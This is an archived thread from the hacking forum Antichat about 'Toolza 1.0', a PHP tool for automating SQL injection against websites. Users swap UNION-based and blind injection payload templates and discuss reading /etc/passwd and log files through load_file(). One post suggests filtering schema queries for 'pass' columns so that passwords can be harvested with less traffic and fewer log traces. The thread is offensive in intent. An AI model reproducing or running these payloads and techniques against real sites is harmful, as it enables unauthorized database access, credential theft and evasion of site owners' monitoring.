Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Toolza 1.0 (https://forum.antichat.xyz/showthread.php?t=148915)

YuNi|[c 04.05.2010 03:44

ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))

при твоем условиии так
www.pupkin.com/index.php?param2=13&param1=1+union+select+1,2,3--+

пашет как на
www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа:
$filtr_c = "--+&param2=13&param2=1543&param3=43&param5=545&param 6=132342&param7=54&param8=13"; # close SQL

AKYLA 04.05.2010 17:36

Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять )
Вот еще бы была реализация для лома через куки и хидер )

YuNi|[c 08.05.2010 02:39

Цитата:

Сообщение от AKYLA
Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять )
Вот еще бы была реализация для лома через куки и хидер )

да было бы здорово если пашкела реализует функцию инжекта через куки и хедер

ZAV 14.05.2010 16:30

на мой взгляд очень облегчает жизнь при хеке очень понравилось

Pashkela 19.05.2010 19:57

update:======>download

Исправлены существенные ошибки в floor(rand()) методе, теперь ничего не пропускает и работает как положено.

Pashkela 28.05.2010 19:22

update:======>download

Добавлены некоторые возможности в Blind-sql inj для различных ситуаций:

Код:

################################################################################
## Blind SQL-injection настройки | Blind SQL-injection settings##
################################################################################
$bl_mode = 0; # mode of blind sql injection:
#-----------------------------------------------------------------------------------------------------------------
# mode 0 example - http://site.com/index.php?id=1+and+substring(version(),1,1)=5--+
#in script:
#$bl_url = "http://site.com/index.php?id=1";
#$bl_filtr = "--+";
#$bl_plus = "+";
#$bl_error = "here_wrong_message";
#$bl_error_type = 0;
#-----------------------------------------------------------------------------------------------------------------
# mode 1 example - http://site.com/index.php?id=1+and+1=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2))
#in script:
#$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
#$bl_filtr = "),1,(select+1+union+select+2))";
#$bl_plus = "+";
#$bl_error = "here_wrong_message";
#$bl_error_type = 0;
#-----------------------------------------------------------------------------------------------------------------

т.е. если у вас так или иначе в рабочем запросе присутствует "substring(version( ),1,1)=5" (ну 5 тут понятно, меняется) - то можно юзать в тулзе независимо от навороченности конструкции

PS: Можно было бы сделать и проще, без разных режимов, но сделал добавление только из расчета того, чтобы юзеры, которые пользовали прогу раньше, не путались

DrakonHaSh 17.06.2010 20:04

на днях раскручивал тулзой блинд.
бага: парочку букв нашлось неверно, некоторые оказались = ? возможно это связано с глюками потоков. раньше, через [LFI/Reader/Load_file() - unvisual error when wrong query] замечал глюк с неверным отображением найденного файла, пример вывода:
====================================
//etc/passwd
====================================
мусор
====================================
//logs/error.log
====================================
данные из /etc/passwd

какой-то подозрительный нюанс :)
тулза делает так:
GET http://site/path ...
а браузеры так:
GET /path ...

предложение фичи
учитывая, что интересуют нас обычно строго определенные значения таблиц и полей, и то, что блинд занимает туеву хучу трафика и логов, можно добавить условие в выборку [на имя колонок, на имена таблиц], по типу:

условие на колонку = pass
=>
select column_name from information_schema.columns where instr(lower(column_name), 0x70617373) > 0;

+ предопределенные условия на
table_schema != information_schema
table_schema != mysql [ее доступность вообще одним отдельным запросом проверять]

предложение фичи [непринципиально, но уж точно полезно :) ]
сделать сохранение уже сграбленных данных для последующего использования, а то при каждом новом выборе в меню часто грабятся сначала те же данные, что уже и были сграблены.

diehard 17.06.2010 20:15

Цитата:

Сообщение от DrakonHaSh
какой-то подозрительный нюанс :)
тулза делает так:
GET http://site/path ...
а браузеры так:
GET /path ...

более подозрительный нюанс это 100500тыщ записей в логе )))


Время: 22:02